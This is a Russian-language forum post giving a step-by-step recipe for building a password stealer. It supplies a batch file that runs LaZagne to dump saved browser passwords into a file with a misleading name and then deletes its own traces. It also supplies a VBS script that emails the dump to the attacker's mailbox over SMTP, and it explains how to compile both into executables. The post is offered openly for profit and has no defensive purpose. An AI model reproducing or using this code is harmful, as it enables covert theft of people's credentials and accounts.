Jump to content
Search In
  • More options...
Find results that contain...
Find results in...
Sign in to follow this  
mr.save

Собираем свой стиллер

Recommended Posts

Вирус: стиллер

Способ отправки отчета: почтовый ящик

Сложность: проще некуда

Поддерживаемые браузеры на момент написания статьи: IE, Chrome, Firefox, Opera

Нам понадобится:

1. LaZagne - прога для восстановления паролей и записи их в файл.

2. Batch файл для запуска LaZagne и указания директории сохранения отчета и его имени.

3. Скрипт на VBS для отправки письма на почтовый адрес.

4. Конвертер VBS to EXE(по желанию, можно и без него).

5. Конвертер BAT to EXE.

Шаг 1.

Создаем Batch файл со следующими строками:

[USER=98981]@Echo[/USER] off

laZagne.exe all > D:\install_error.bin

TIMEOUT /T 2

sender.exe

TIMEOUT /T 5

del /s "%UserProfile%\Downloads\laZagne.exe"

del /s "%UserProfile%\Downloads\SENDER.exe"

del /s "%UserProfile%\Desktop\laZagne.exe"

del /s "%UserProfile%\Desktop\SENDER.exe"

где "D:\install_error.bin" - директория и имя сохраненного отчета, TIMEOUT - необходим для ожидания создания отчета(в среднем занимает этот процесс 1 секунду для 100 паролей).

Шаг 2.

Создаем обычный текстовый документ в Notepad++, например. И сохраняем его в формате .vbs

Код:

Dim o_Mess, v_Conf

v_Conf = "http://schemas.microsoft.com/cdo/configuration/"

Set o_Mess = CreateObject("CDO.Message")

With o_Mess

.To = "получатель@mail.ru" 'куда отправляем

.From = "Имя <отправитель@mail.ru>" 'имя отправителя + Email

.Subject = "Log" 'Тема письма

.TextBody = "BodyMail" 'Сообщение

.AddAttachment "D:\install_error.bin" 'Прикрепить файл

.TextBodyPart.Charset = "windows-1251" 'русская кодировка

With .Configuration.Fields

.Item(v_Conf & "sendusing") = 2 'без использования каталога Server Exchange

.Item(v_Conf & "smtpserver") = "smtp.mail.ru" 'Адрес SMTP-сервера

.Item(v_Conf & "smtpauthenticate") = 1 'Тип авторизации

.Item(v_Conf & "sendusername") = "отправитель@mail.ru" 'здесь имя пользователя

.Item(v_Conf & "sendpassword") = "пароль отправителя" 'пароль

.Item(v_Conf & "smtpserverport") = 465 'порт (альтернативный - 465)

.Item(v_Conf & "smtpusessl") = True 'использовать ли шифрованое подключение SSL

.Item(v_Conf & "smtpconnectiontimeout") = 60 'Время до завершения повторных попыток подключения

.Update

End With

.send

End With

Set o_Mess = Nothing

Шаг 3.

Компилируем данную кашу через BAT to EXE конвертер.

Примечание: Обратите внимание на файл SENDER.EXE, в данном случае использовался конвертер VBS to EXE.

46217a2385616036cbb62.png.10a4b36c5fff2a8bf7c3f855abf965c0.png

После, сохраняем наш .exe файл и запускаем его.

Шаг 4.

Заходим на почтовый ящик и проверяем письмо.

2226293a8c76c68d7b1ad.png.beb9fa5915b07baac9a4f38a47d80cd9.png

Шаг 5.

Открываем файл у себя на компьютере через текстовый редактор и радуемся профиту.

1a3b3bc5aa417ed345874.png.b703b8ac40f6e4200bb3b025017f6891.png

Share this post


Link to post

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×
×
  • Create New...